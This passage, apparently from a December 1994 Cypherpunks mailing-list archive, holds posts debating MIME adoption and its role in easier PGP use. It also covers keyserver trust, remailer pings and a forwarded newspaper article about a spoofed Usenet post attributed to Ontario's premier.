Once you've seen a secretary who barely understands anything drag a spreadsheet into a mail message and send it to someone on another continent who, equally ignorantly, just double-clicks on it and then has the spreadsheet program launch, you will understand what the point of MIME is. Without a MIME capable reader you can't do any of these things, of course. Even with one, you might not initially see any benefits because you might be using a mediocre reader or you might not have any correspondents who do snazzy things. However, MIME is rapidly being deployed and is going to be universal within a couple of years. It's not just a silly way to sign your name with a GIF. > Like it or not, we are now in a mostly-ASCII Net environment. We are in a mostly graphical net environment. It's been seven years since I used a machine (for more than a few minutes) that didn't have a bitmapped display. The Macintosh you are sitting in front of right now knows nothing about ASCII -- it's a bitmapped display, not a character generator based display, and it can show whatever font you like. What you are actually saying is that you use a primitive interface into your network service provider rather than, say, SLIP or PPP, and that because of this you are restricted to dumb-terminal type operations on a computer that is far more capable than that. Were I you, I'd get PPP account from Netcom and a POP based mailer to handle your mail reading directly on your Mac. You will no longer have to bitch about downloading your mail to the mac to decrypt it -- you will be able to just drag and drop mail into PGP with the right tools. You won't have to worry about MIME with the right package, either. > The "Display Postscript" standard was an attempt to bootstrap the > world to a new standard for document display, and it failed. Display postscript was for windowing systems. It had nothing to do with document displays per se. I can view postscript just as easily here on my workstation as ASCII.
Display postscript was not a document viewer technology but a way of building things like NeXTStep, which did indeed fail -- but that's because X won, and X is in wide use. Perry From jrochkin at cs.oberlin.edu Thu Dec 15 14:54:56 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Thu, 15 Dec 94 14:54:56 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: At 5:27 PM 12/15/94, Timothy C. May wrote: >For example, I could spend some number of hours switching from my >current mail progam (elm) to some other editor which perhaps >better-supported the MIME messages seen here. But if all I got for >several hours of using, learning, and becoming comfortable with, say, >"pine," was the ability to see an _italicized_ word, or a word in >Cyrillic, then I would consider this a poor ROI. Well, I certainly agree with you, and I expect most everyone else does too. No one expects anyone to spend lots of time with minimal returns on that time. But the reason I think you are meeting so much animosity is because there are lots of people here who think MIME is the solution to making encryption easier to use. Whether or not Joe Random User switches to a MIME compliant app so he can see italicized words is irrelevant. But what _is_ relevant is whether Joe Programmer writes his mail reader to be MIME compliant, and specifically, writes it to appropriately deal with the about-to-be-standardized PGP types. We all agree that it's currently much too hard to deal with PGP on a regular basis, for most people. Some people are satisfied with the tools they have, but the vast majority of people either don't have access to those tools, or don't think the available tools are sufficient. It's not currently easy to use PGP on a regular basis, and this is a big problem. A lot of people are convinced that MIME is the solution to this problem, and rightly so in my opinion.
And they take many of your comments to be counter productive, in that we "should" be encouraging MIME, and we "should" be excited about MIMEs possibilities in this area. And of course people like MIME for other reasons too. But I don't think anyone is trying to blame Tim C. May, or anyone else, for thinking the current tools suck, and for not wanting to deal with MIME with the current tools. Everything is a cost benefit equation, and it's up to you to weigh the costs and benefits. But people see MIME as exciting technology, which if properly implemented, can do lots of really cool things. Not the least of which is make it easy/possible for mailers to deal with PGP correctly. Steve Dorner, who writes Eudora, is working on a new version that will interact with PGP transparently. He's been talking about it a bit on the MCIP list, and I'm very excited about it. It should make using PGP with Eudora incredibly easy. And he's relying on MIME, and the incipient PGP and encryption MIME standards, to make it work. From claborne at microcosm.sandiegoca.NCR.COM Thu Dec 15 15:08:22 1994 From: claborne at microcosm.sandiegoca.NCR.COM (Claborne, Chris) Date: Thu, 15 Dec 94 15:08:22 PST Subject: PGP Docs in HTML??? Message-ID: <2EF0C052@microcosm.SanDiegoCA.NCR.COM> I am currently working on turning the PGP documentation into a HTML document with clickable table of contents.... Someone has probably already done this. I am doing it here for my "Security" home page at AT&T GIS San Diego, mainly for educational purposes. Do you know of anyone that has done this? If not I can post somewhere when I complete. It's a big task. ... __o .. -\<, chris.claborne at sandiegoca.attgis.com ...(*)/(*). CI$: 76340.2422 PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. PGP-encrypted e-mail welcome! From db at Tadpole.COM Thu Dec 15 15:24:23 1994 From: db at Tadpole.COM (Doug Barnes) Date: Thu, 15 Dec 94 15:24:23 PST Subject: McCoy is Right! 
New Mail Format to Start Now. In-Reply-To: <199412152227.OAA05100@netcom12.netcom.com> Message-ID: <9412152323.AA01634@tadpole.tadpole.com> I actually sympathize with Tim's position and Eric's earlier comments about adopting tools as a function of ROI. I often experience something similar with "potentially faster but non-deterministic time solutions," vs. "probably slower but deterministic time solutions." That said, I think that MIME, for all its implementation difficulties, is going to be an attractor, if for no other reason than the fact that there is an increasing demand for _something_ to encapsulate all the divergent stuff that people want to push and pull across the net, and MIME is the standard for doing this. For instance, it is used to encapsulate html, and some advocate an expansion of its use in conjunction with the web. [Note that this does not make the various cock-ups that can occur in conjunction with its expanding use in e-mail any less annoying.] I'm also curious what James is using on his Sun, as Sun's mailtool (at least the version I have) is pre-MIME, but MIME-ish, and can choke in amusing ways on MIME messages. Doug From maher at kauai.UCSD.EDU Thu Dec 15 15:28:23 1994 From: maher at kauai.UCSD.EDU (Kevin E. Maher) Date: Thu, 15 Dec 94 15:28:23 PST Subject: PGP Docs in HTML??? In-Reply-To: <2EF0C052@microcosm.SanDiegoCA.NCR.COM> Message-ID: <9412152327.AA06328@kauai.UCSD.EDU> -----BEGIN PGP SIGNED MESSAGE----- > Do you know of anyone that has done this? If not I can post somewhere >when I complete. It's a big task.
Somebody's done it: http://www.pegasus.esprit.ec.org/people/arne/pgp.html Kevin - -- Kevin Maher Programmer/Analyst kmaher at ucsd.edu Institute of Geophysics and Planetary Physics (619) 534-9828 Scripps Institution of Oceanography, UC San Diego From jamesd at netcom.com Thu Dec 15 15:35:31 1994 From: jamesd at netcom.com (James A. Donald) Date: Thu, 15 Dec 94 15:35:31 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: <9412152226.AA01486@snark.imsi.com> Message-ID: <199412152333.PAA28121@netcom10.netcom.com> James A. Donald says: > > No two mimes seem to entirely agree what mime format is. Perry E. Metzger writes > Well, the specification is pretty clear. Its pretty simple stuff, > actually, and remarkably well designed. Quite true. But the technology has not achieved the critical mass that you need for most software producers to support it properly. Sun does not support it, Microsoft screws it up royally last time I looked. Thus mime is, as Tim earlier complained, bleeding edge. Netscape is leading edge. Obviously mime is the right solution for Email in the long run. Equally obviously, none of the tools that I prefer to use, on any of the systems that I have connected to the internet, handle mime in a way that I am willing to tolerate. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state.
                                         jamesd at netcom.com

From abostick at netcom.com Thu Dec 15 15:43:24 1994
From: abostick at netcom.com (Alan Bostick)
Date: Thu, 15 Dec 94 15:43:24 PST
Subject: Articles on Adelman and E=mc(2)
In-Reply-To: <9412131605.AA12267@snark.imsi.com>
Message-ID: <44uxkyczB8-P073yn@netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

In article <9412131605.AA12267 at snark.imsi.com>, you wrote:
>
> The article contains a serious inaccuracy -- it credits Adleman with
> having invented the term "Computer Virus", when, in fact, it was
> probably John Brunner in his novel "The Shockwave Rider" over ten
> years earlier. It also inaccurately credits one of his students with
> developing the first one as a test, when in fact they existed for a
> long time before.
>
> .pm
>

The notion of a computer virus predates THE SHOCKWAVE RIDER. Gregory
Benford used the notion in a short story published in AMAZING STORIES
in 1973 or 1974. It was an idea mentioned in passing in a story taking
place in a mining town in Antarctica. (Sorry, but I can't provide any
more bibliographic data than that; I'm relying strictly on memory.)
Benford definitely used the word "virus" to describe how the thing
reproduces.

In 1975 (the same year that THE SHOCKWAVE RIDER came out) Laser Books
published the notoriously bad SEEDS OF CHANGE, by Thomas F. Monteleone.
Monteleone has the Evial Computer That Rules The World brought down by
feeding it something called a "Benford program," i.e. a virus.

I couldn't say for sure whether the idea of computer viruses was
original to Benford or not. He is a theoretical plasma physicist who in
his misspent youth worked at Lawrence Livermore National Laboratory in
the weapons program. It is possible that he worked on numerical
modeling of plasmas in a secure computing environment, and that viruses
were part of the threat models of the Livermore computer security
people.

If he did invent the idea, then he has a lot to answer for. . . .
                               | For me, to be a feminist is to answer the
Alan Bostick                   | question "Are women human?" with a yes.
abostick at netcom.com         |
finger for PGP public key      | Katha Pollitt, REASONABLE CREATURES
Key fingerprint:               |
50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From perry at imsi.com Thu Dec 15 15:43:32 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 15 Dec 94 15:43:32 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412152333.PAA28121@netcom10.netcom.com>
Message-ID: <9412152342.AA01611@snark.imsi.com>

James A. Donald says:
> Thus mime is, as Tim earlier complained, bleeding edge.
>
> Netscape is leading edge.

Please note that MIME is an encapsulation methodology -- ZMail,
Eudora, AMS and others are implementations. Netscape is an
implementation. HTML and HTTP are the things that it implements (along
with some other protocols). Just keep in mind the distinction between
a standard and the implementations of that standard -- they are
different.

Perry

From dave at esi.COM.AU Thu Dec 15 16:11:22 1994
From: dave at esi.COM.AU (Dave Horsfall)
Date: Thu, 15 Dec 94 16:11:22 PST
Subject: Zimmermann Defense Fund Appeal
In-Reply-To: <9412160924.ZM13302@wiley.sydney.sgi.com>
Message-ID:

On Fri, 16 Dec 1994, Ian Farquhar wrote:

> Very true. Try as I might, I cannot think of any legal system in the
> world where a large amount of money cannot buy justice... or injustice.

With the possible exception of some indigenous peoples, such as the
Australian aborigines.

--
Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine.
| E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD

From jdwilson at gold.chem.hawaii.edu Thu Dec 15 16:28:33 1994
From: jdwilson at gold.chem.hawaii.edu (NetSurfer)
Date: Thu, 15 Dec 94 16:28:33 PST
Subject: FV & PGP (was Re: First Virtual email security)
Message-ID: <199412160033.TAA07984@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Thanks for the clarification - I missed that part.

- ---
[This message has been signed by an auto-signing service. A valid
signature means only that it has been received at the address
corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Thu Dec 15 16:31:52 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Thu, 15 Dec 94 16:31:52 PST
Subject: Many-Hop Remailer Ping Messages
Message-ID: <199412160036.TAA07996@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Some agent periodically sends out several hundred line remailer ping
messages (unencrypted) with many hops planned; a sample is included
below. It would be nice if the parties responsible would remove my
address (and, for example, Eric Frias' address and the leri address)
since I'm not operating a remailer at this address any longer. Adding
in the newer remailers might be a wise move if this is supposed to
produce results representative of the entire remailer bramble. In the
immortal words of Kibo, "PLEASE UPDATE YOUR COSMIC PARAMETERS."

Thanks.

- - -L. Futplex McCarthy

Forwarded message:
> To: lmccarth at ducie.cs.umass.edu
>
> ::
> Anon-To: remailer at ideath.goldenbear.com
>
> ::
> Anon-To: remail at leri.edu
>
> ::
> Anon-To: efrias at csugrad.cs.vt.edu
[many lines omitted...]

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----

- ---
[This message has been signed by an auto-signing service. A valid
signature means only that it has been received at the address
corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From sdw at lig.net Thu Dec 15 16:46:37 1994
From: sdw at lig.net (Stephen D. Williams)
Date: Thu, 15 Dec 94 16:46:37 PST
Subject: Algebra
In-Reply-To: <9412152037.AA01349@snark.imsi.com>
Message-ID:

This really reminds me that I'd like to start gathering short
discourses on various subjects to make a WWW educational
library/courses. It has everything you'd need and there are lots of
things even I'd like to write about.

I'm really thinking of a contrib learning library.

Does anyone know if someone has started this yet?

If not, I'll organize a structure, contrib guidelines, WWW server that
allows contrib, voting (on best ways to learn something), etc. and try
to think up a domain that isn't taken. I'll by necessity have to set
it up and let it run since I'm already overloaded with work and family.

My feeling is that there is lots of stuff out there already and that
it needs to be organized. Not overly so as traditional schooling is,
but in a way that allows organic learning and search for what you may
need to learn.

I'll start it on my web server and see about mirroring on my friends
systems (who have faster connections).

And now, the reason I decided to dump this here, I'd like to ask
permission to include discourses like the one just given.

comments please!

selfed.com or selfedu.com or maybe self-ed.com?????

> Tom Jones says:
> > Dear Eric and Cypherpunks,
> >
> > So, how is division defined in Fp?
>
> Being an old fogey, I still refer to the field formed by the integers
> modulo a prime by a gothic capital Z sub p.
>
> In Z_p, you define division as the inverse of multiplication, just as
> in real life. One easy way to do this is to note that every number in
> a field like this has a multiplicative inverse. Multiplying by the
> multiplicative inverse of a number is the same as dividing by the
> number.
>
> For the hell of it, make yourself a multiplication table for Z_5. It's
> a quick exercise. Note that every number in Z_5 other than zero
> possesses a multiplicative inverse -- that is, a number that it can be
> multiplied against to yield 1. Step back and then observe,
> experimentally, that for any three positive numbers in Z_5 A, B and C
> such that A*B=C, that C*(B^-1)=A. One can, of course, prove that this
> is the case rigorously...
>
> Perry
>

--
Stephen D. Williams 25Feb1965 VW,OH      sdw at lig.net http://www.lig.net/~sdw
Senior Consultant    510.503.9227 CA Page  513.496.5223 OH Page BA Aug94-Dec95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.29Nov94

From explorer at iastate.edu Thu Dec 15 17:00:04 1994
From: explorer at iastate.edu (Michael Graff)
Date: Thu, 15 Dec 94 17:00:04 PST
Subject: No Subject
In-Reply-To:
Message-ID: <9412160059.AA25877@du81-13.cc.iastate.edu>

>Why is it possible for someone other than ME to add MY key to a keyserver?
>I realize that at some point (perhaps only the first time you submit a
>key?), there has to be some trust model employed, but it seems like this
>anyone-can-submit-anyone-else's-key situation offers a very obvious attack:
>anyone could propagate bogus keys across the net by just generating bogus
>keys with someone else's email/name on them, leading to massive
>impersonation problems.

Yes, there are such possibilities.

>Maybe I'm missing something obvious, but it seems like there should be a
>more rigorous method available to, and employed by, keyserver operators for
>verifying someone's identity before accepting a key submitted (supposedly)
>by them. Shouldn't the key submission msg itself at minimum be required to
>be contained within a signed msg from someone with enough "nearness" in
>trust levels from some trusted introducer known to the keyserver op? I
>thought this sort of situation was precisely the reason for the trust level
>system in PGP in the first place.

>This may be a can of worms (or not), but if cpunks require fairly decent
>methods for verifying the identities of people who want to trade keys with
>them personally, then it seems keyservers should require at LEAST that
>level of verification (or better).

Sure. Are you offering to do the coding?

>I'd like to CLEAR/REMOVE ALL keys from ALL keyservers that are:
> - attributed to me by others (without my knowledge)
> - added by others (unknown to me)
> - purporting to have been generated by me)
>and start with a tabula rasa. Maybe in a few weeks, once all these (what I
>consider to be) bogus keys are GONE, I can add my actual key to a
>keyserver.

Until someone writes code to deal with owner-submission (or whatever)
you're SOL. Even if all the operators were to delete all of your keys,
someone would eventually mail their entire ring to a server, and those
bogus keys would be back up again.

You mentioned that you didn't keep your secret key for one of your
now-defunct keys. Why not?
Are the servers supposed to clean up after you now too?

>There doesn't seem to be any elegant mechanism available for doing this
>yet, but I'm ready to be educated on this point. Any comments?

Do you know how to code in Perl? Code submissions welcome.

--Michael

--
Michael Graff          Iowa State University Computation Center
Project Vincent        215 Durham              voice: (515) 294-4994
explorer at iastate.edu Ames, IA 50011          fax: (515) 294-1717
gg.mlg at isumvs.bitnet

From anonymous-remailer at shell.portal.com Thu Dec 15 17:09:47 1994
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 15 Dec 94 17:09:47 PST
Subject: MIME
Message-ID: <199412160109.RAA04201@jobe.shell.portal.com>

> Once you've seen a secretary who barely understands anything drag a
> spreadsheet into a mail message and send it to someone on another
> continent who, equally ignorantly, just double-clicks on it and then
> has the spreadsheet program launch, you will understand what the point
> of MIME is.

Is this what the big deal about MIME is?

Damn, I've been doing this (cutting and pasting spreadsheets,
launching them by double clicking) for years now on Mac's and PC's
running Windows. Heck, under NeXTSTEP as well.

From jonathon at izanagi.sbi.com Thu Dec 15 17:32:17 1994
From: jonathon at izanagi.sbi.com (Jonathon Fletcher)
Date: Thu, 15 Dec 94 17:32:17 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412152012.MAA28503@netcom2.netcom.com>
Message-ID:

On Thu, 15 Dec 1994, Timothy C. May wrote:

>
> I see two "stable attractors" for text/graphics/multimedia/etc. sent
> over the Net:
>
> 1. Straight text, ASCII, 80 column format. All systems can handle
> this, all mailers and newsreaders can handle it, it's what the Usenet
> is essentially based upon, and it gets the job done. It meets the
> needs of 95% of us for 95% of our needs.
>
> 2. The Web, for graphics, images, etc. This will be the next main
> stable attractor, deployed on many platforms.
> (I'm assuming the debate
> here about Netscape standards does not imply much of a fragmentation,
> that Mosaic, Netscape, MacWeb, etc., will all basically be able to
> display Web pages in much the same way.)
>

Okay, I'll go with that. I'd just like to point out that http
(transport for documents served on the web) uses mime. That's how your
browser knows something is html, or a picture of some format, or
postscript.

find a web server (pick one) and telnet to it:

% telnet my.web.server 80

enter the following line and press return *twice*

HEAD / HTTP/1.0

(you need the second line because the server is expecting a mime
header from you - ended by a blank line). You'll get some answer like:

HTTP/1.0 200 OK
Date: Friday, 16-Dec-94 01:09:44 GMT
Server: NCSA/1.3
MIME-version: 1.0
Content-type: text/html
Last-modified: Tuesday, 06-Dec-94 06:10:37 GMT
Content-length: 1067

That's the server's answer to your query - one mime header (the http
HEAD request asks for info about a document).

If you have a mailer that doesn't automagically verify signatures and
pack and unpack pgp messages it's a pain (I know tim will agree with
this). If you have a mailer that can't pack and unpack mime then it's a
pain too. Just because your mailer doesn't support it doesn't mean that
mime (or email privacy !) is a bad thing.

-Jon

PS: for those with macs or pcs or unix machines that don't have mime.
please take a look at mpack - might find it useful.
ftp://ftp.andrew.cmu.edu/pub/mpack

--
j.fletcher at stirling.ac.uk
"opinions expressed are those of the author and not necessarily those
of anyone or anything else."

From amanda at intercon.com Thu Dec 15 17:37:16 1994
From: amanda at intercon.com (Amanda Walker)
Date: Thu, 15 Dec 94 17:37:16 PST
Subject: McCoy is Right! New Mail Format to Start Now.
Message-ID: <199412160136.UAA11193@intercon.com>

> But this isn't 15 years ago, and I daresay there isn't a _single_
> subscriber to the Cypherpunks list using a VIC-20 or anything remotely
> similar.
> Of the 600 or so subscribers, and certainly of the 100-200
> involved posters, I would bet that essentially all of them can display
> ASCII text on an 80-column screen.

... when they're at their desk. There has been an explosion, however, of
non-80-column-capable devices on which people want to read their email.
Alphanumeric pagers, Handheld PDAs, palmtop computers, etc. Give me a radio
modem with reasonable service coverage, and I'd want to read at least some
kinds of mail on my Newton (about 32-48 characters across the display).
In fact, the ability to display graphics is becoming universal in areas
where 80 columns have been tossed aside.

Very few people use actual terminals any more. I'd be amazed if any more
than 5-10% of the readership of this group (and the Internet at large)
were using anything but a graphics display, even if it's emulating a VT100.

I should stop now, though. I feel the urge to bring up Hollerith cards
and keypunches again :).

Amanda Walker
InterCon Systems Corporation

From perry at imsi.com Thu Dec 15 18:17:25 1994
From: perry at imsi.com (Perry E. Metzger)
Date: Thu, 15 Dec 94 18:17:25 PST
Subject: MIME
In-Reply-To: <199412160109.RAA04201@jobe.shell.portal.com>
Message-ID: <9412160217.AA01737@snark.imsi.com>

Mr. Anonymous does well to remain anonymous. His comments are
embarrassing to him.

Naturally the idea is old -- I explicitly mentioned NeXT mail, didn't
I? The point is that this is an open, non-proprietary, and
STANDARDIZED framework for doing arbitrary recursive encapsulation of
data in EMail.

Perry

anonymous-remailer at shell.portal.com says:
> > Once you've seen a secretary who barely understands anything drag a
> > spreadsheet into a mail message and send it to someone on another
> > continent who, equally ignorantly, just double-clicks on it and then
> > has the spreadsheet program launch, you will understand what the point
> > of MIME is.
>
> Is this what the big deal about MIME is?
>
> Damn, I've been doing this (cutting and pasting spreadsheets,
> launching them by double clicking) for years now on Mac's and PC's
> running Windows. Heck, under NeXTSTEP as well.
>

From jonathon at izanagi.sbi.com Thu Dec 15 18:19:46 1994
From: jonathon at izanagi.sbi.com (Jonathon Fletcher)
Date: Thu, 15 Dec 94 18:19:46 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412152216.OAA19537@netcom10.netcom.com>
Message-ID:

On Thu, 15 Dec 1994, James A. Donald wrote:

> Perry E. Metzger writes
> > The point, Tim, is that you keep conflating a bad MIME read that you
> > happen to use with the notion that MIME is bad.
>
> No two mimes seem to entirely agree what mime format is.
>
> I use Sun's stuff. It is a pile of stinking shit.
>
> Sure, mime would be great if everyone had a great Mime
> and every diverse system with every diverse mime
> interpreter all worked and they all worked in the same
> way.
>

There is only ONE MIME - it's in the rfc (I've forgotten the number). If
it's the same as the rfc - it's MIME. if it ain't then it ain't MIME.

The sun stuff is a good example of how bad it can get. But it's not MIME. not
mailtool anyway. It is a stinking pile of [insert expletive here]. But it's
not MIME.

-Jon

--
j.fletcher at stirling.ac.uk
"opinions are my own.
not necessarily those of anyone or anything else"

From werewolf at io.org Thu Dec 15 18:42:28 1994
From: werewolf at io.org (Mark Terka)
Date: Thu, 15 Dec 94 18:42:28 PST
Subject: The End of the Forged Post Controversey
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

It would appear that the "Bob Rae Forgery" had its standard 15 minutes
of fame:

From: eye at interlog.com (eye WEEKLY)
Newsgroups: eye.news,ont.general,alt.internet.media-coverage
Subject: EYE.NET: Mike Harris -- Roasted Alive
Followup-To: eye.general,ont.general,alt.internet.media-coverage
Date: 14 Dec 1994 11:00:20 -0500
Organization: eye -- Toronto's Arts Newspaper
Lines: 160
Approved: eye at interlog.com
Message-ID: <3cn4qk$ec0 at gold.interlog.com>
NNTP-Posting-Host: gold.interlog.com
Summary: Ontario PC leader pulls net.related bonehead political stunt
Xref: io.org eye.news:307 ont.general:20751 alt.internet.media-coverage:2470

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
eye WEEKLY                                            December 15 1994
Toronto's arts newspaper                      .....free every Thursday
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EYE.NET                                                        EYE.NET

                      MIKE HARRIS: ROASTED ALIVE
  Clueless PC leader mercilessly flamed for net-related political stunt

                                  by
                             K.K. CAMPBELL

On Dec 8, provincial PC leader Mike Harris stood in the Legislature
and introduced a copy of a post to the newsgroup ont.general -- a
public forum where anything of general interest to Ontarians is
discussed.

The post in question was signed "Bob Rae." It talked about the sexual
orientation of Marion Boyd, the Karla Homolka case, and a few other
things. Harris wasn't claiming Rae actually wrote it, he was
suggesting it was proof of a serious "security violation" in
government computer systems.

Simultaneously, the PCs issued a press release entitled "Our Premier:
Roadkill on the Information Highway."

We regularly warn Our Faithful Readers about eyeNET's Rule#1: When
strangers approach wielding the "highway metaphor," run.
Do not speak with them. Do not make eye contact.

Last week, eyeNET predicted many new and entertaining adventures could
result from Ontario's premier getting online. We expected the
shenanigans would come from anonymous net.weenies and assorted loons,
not Mike Harris.

ARTIFICIAL BOB

It began innocently on Sunday Dec 3, at 1:22:41 a.m. (EST), when an
anonymous individual posted a message called "Greetings to People of
Ontario's Information Highway" to ont.general. It was faked so the
"From:" line said "premier at govonca.gov.on.ca", Rae's office.

Ontarians read it. Ontarians ignored it.

The general response was best summed up by Toronto's Val Dodge
(val at io.org), who wrote: "Am I the only one getting tired of [these
spoof posts]? OK, the first couple were funny, but this is getting
really tedious."

No one thought it was from Rae. No one thought it was from "hackers
invading government computers." Netters just looked at the PATH line
and could see the post worked its way to Ontario from a California
computer. On top of that, in the header it plainly says: "This message
is NOT from the person listed in the from line. It is from an
automated software remailing service..."

Fake posts are part of net.life, but this one wasn't even a "forgery"
(a real attempt to pretend to be someone else), it was a "spoof" (an
"imitation" no one is expected to believe). A parody. Hardly a
"security violation," unless Harris thinks all political impersonators
represent "security violations." What if terminally dense Americans
thought impersonator Dana Carvey really _was_ George Bush? Oh my GAWD!
Call the cops!

Rae's staff had noticed the fake post. Like the rest of the
net.community, they just ignored it. After all, even the stupidest
elements of the net community hadn't been fooled... why worry?

They didn't account for Mike Harris.

Five days later Harris issued his now famous "Roadkill" press release
which includes the line "Internet Bob: the hacker is hacked."

PC press secretary, Peter Varney, told eye the Conservatives weren't
trying to score political points. They sincerely thought this harmless
post was a "threat to Ontario's security" -- though Varney couldn't
explain why Harris attempted to grandstand.

And it's exactly that attempt to make political points from the matter
that most angers Ontario netters. Sensationalization and playing on
the ignorance of the press (which was as rampant as ever).

The PCs swear they never saw the very explicit disclaimer in the fake
Rae post because the newsreader of the person who "slipped" them this
oh-so-dangerous document edited out most header information. It's
plausible -- many newsreaders chop stuff from headers (headers contain
info to help direct and organize posts for ease of reading).

But ignorance hardly excuses Harris.

In our conversation, Varney, trying to save face, actually suggested
the simple ability to make a spoof post (and fool Mike Harris, I
guess) is still a "security threat."

So what are they asking Rae to do about it? Call in the OPP and
stormtroop around cyberspace?

THE NET STRIKES BACK

The net.community's responses in ont.general have been a virtually
unanimous condemnation of Harris.

Several threads (i.e., discussions) developed, the longest one
entitled "MIKE HARRIS IS SLIME." It originated with Brampton's Evan
Leibovitch (evan at telly.on.ca), who wrote he didn't blame the
"impersonator" because "children will be children", but "the people
who fed this item to Harris are absolute assholes... My respect for
Harris and the Ontario PCs has just taken a nosedive, and I hope the
scum who were behind this realize that they have scored *NO* political
points for pulling this stunt."

In another thread, Toronto's Jamie Mason (g1jmason at cdf.toronto.edu)
wrote: "Anyone who has been on the net for more than about FIVE
MINUTES would realize that the message was a forgery.
Anyone who has been on the net for more than about TEN minutes wouldn't
even take notice of the message."

T. Kim Nguyen (kim at algorithmics.com) likened the Harris bluff to
"the way he paraded the woman quitting her job to go on welfare last
year. His antics of the last few weeks trying to make the NDP look bad
have simply succeeded in showing how much of a ridiculous opportunist
he is."

GENUINE BOB

Late Friday afternoon (Dec 9, 5:24 pm), the Premier of Ontario
(premier at govonca.gov.on.ca) issued his first real post to
ont.general. It was called "Thanks" and read, in its entirety:

"Many thanks to those of you who flamed the PC pranksters. I knew when
I went online that I would have to deal with fake posts and related
chaff. That's the price of being on the Net. I'm not about to delete
my account. I still want to hear from people with *real* concerns and
*real* suggestions."

Signed: "Bob*The Genuine Article*Rae"

eye called the premier's office. They confirm it's real.

The premier's office made it clear it won't launch any investigation
as to where the parody post came from -- and for that it should be
applauded. I've talked with many people who don't understand the net
and when something they don't like happens they invariably respond:
"I'm going to shut the Internet down!" The Rae team is doing its best
to fit into the net.community, not remake it.

Varney, on the other hand, says the PCs will actively pursue anyone
who "impersonates" Mike Harris online.

FRESH ROADKILL!

Oh no! Look! Just spotted in ont.general! A breach in PC security!!
Alert! Alert! Call the newsmedia!

On Dec 10, "Mike Harris" supposedly posted a missive called "Mike
Harris Fights Back - Kiss My Ass Rae!" to the net. It reads, in part:

"You listen here Rae, my sources informed me that your article was on
the level. You sleazy NDP wimps are more than capable of resorting to
cheap shots like this, so I thought I'd pin one on your grain-fed
ass... DAMN I'm mad!!!"

Signed: "Mike Harris, Progressive Consevative (sic) Party of Ontario."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Retransmit freely in cyberspace        Author holds standard copyright
Issues of eye in archive                         gopher://interlog.com
Coupla Mailing lists available             http://www.interlog.com/eye
eye at interlog.com    "Break the Gutenberg Lock..."       416-971-8421

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From jamesd at netcom.com Thu Dec 15 19:01:48 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 15 Dec 94 19:01:48 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To:
Message-ID:

On Fri, 16 Dec 1994, Jonathon Fletcher wrote:
>
> There is only ONE MIME - it's in the rfc (I've forgotten the number). If
> it's the same as the rfc - it's MIME. if it ain't then it ain't MIME.
>
> The sun stuff is a good example of how bad it can get. But it's not MIME. not
> mailtool anyway. It is a stinking pile of [insert expletive here]. But it's
> not MIME.

So how can I do true graphical mime with the wondrous window
like drag and drop features described by Perry on a
Sparc 20 or an IBM PC running sockets and TIA under windows?

Obviously, once you can drag and drop from html to mime and back
again, and PGP is properly mimed, then we will have a tool
such that even the chairman of the board will use PGP.

But right now the tools I have are seriously short of this
glorious goal.

While I am not expecting crypto nirvana right away I would like
to stop using an interface originally designed for paper terminals
where you had to hit the keys with a five pound hammer.

Obviously, once you can drag and drop from html to mime and back

The reason that I joined the rant against the latest progress is
not because I am a fan of character mode unix -- I most definitely
am not -- but because tools for GUI internet stuff were rather raw
the last time I tried them.

---------------------------------------------------------------------
We have the right to defend ourselves
and our property, because of the kind
of animals that we                       James A. Donald
are. True law derives from this right,
not from the arbitrary power of the
omnipotent state.                        jamesd at netcom.com

From tcmay at netcom.com Thu Dec 15 19:23:01 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 15 Dec 94 19:23:01 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412160136.UAA11193@intercon.com>
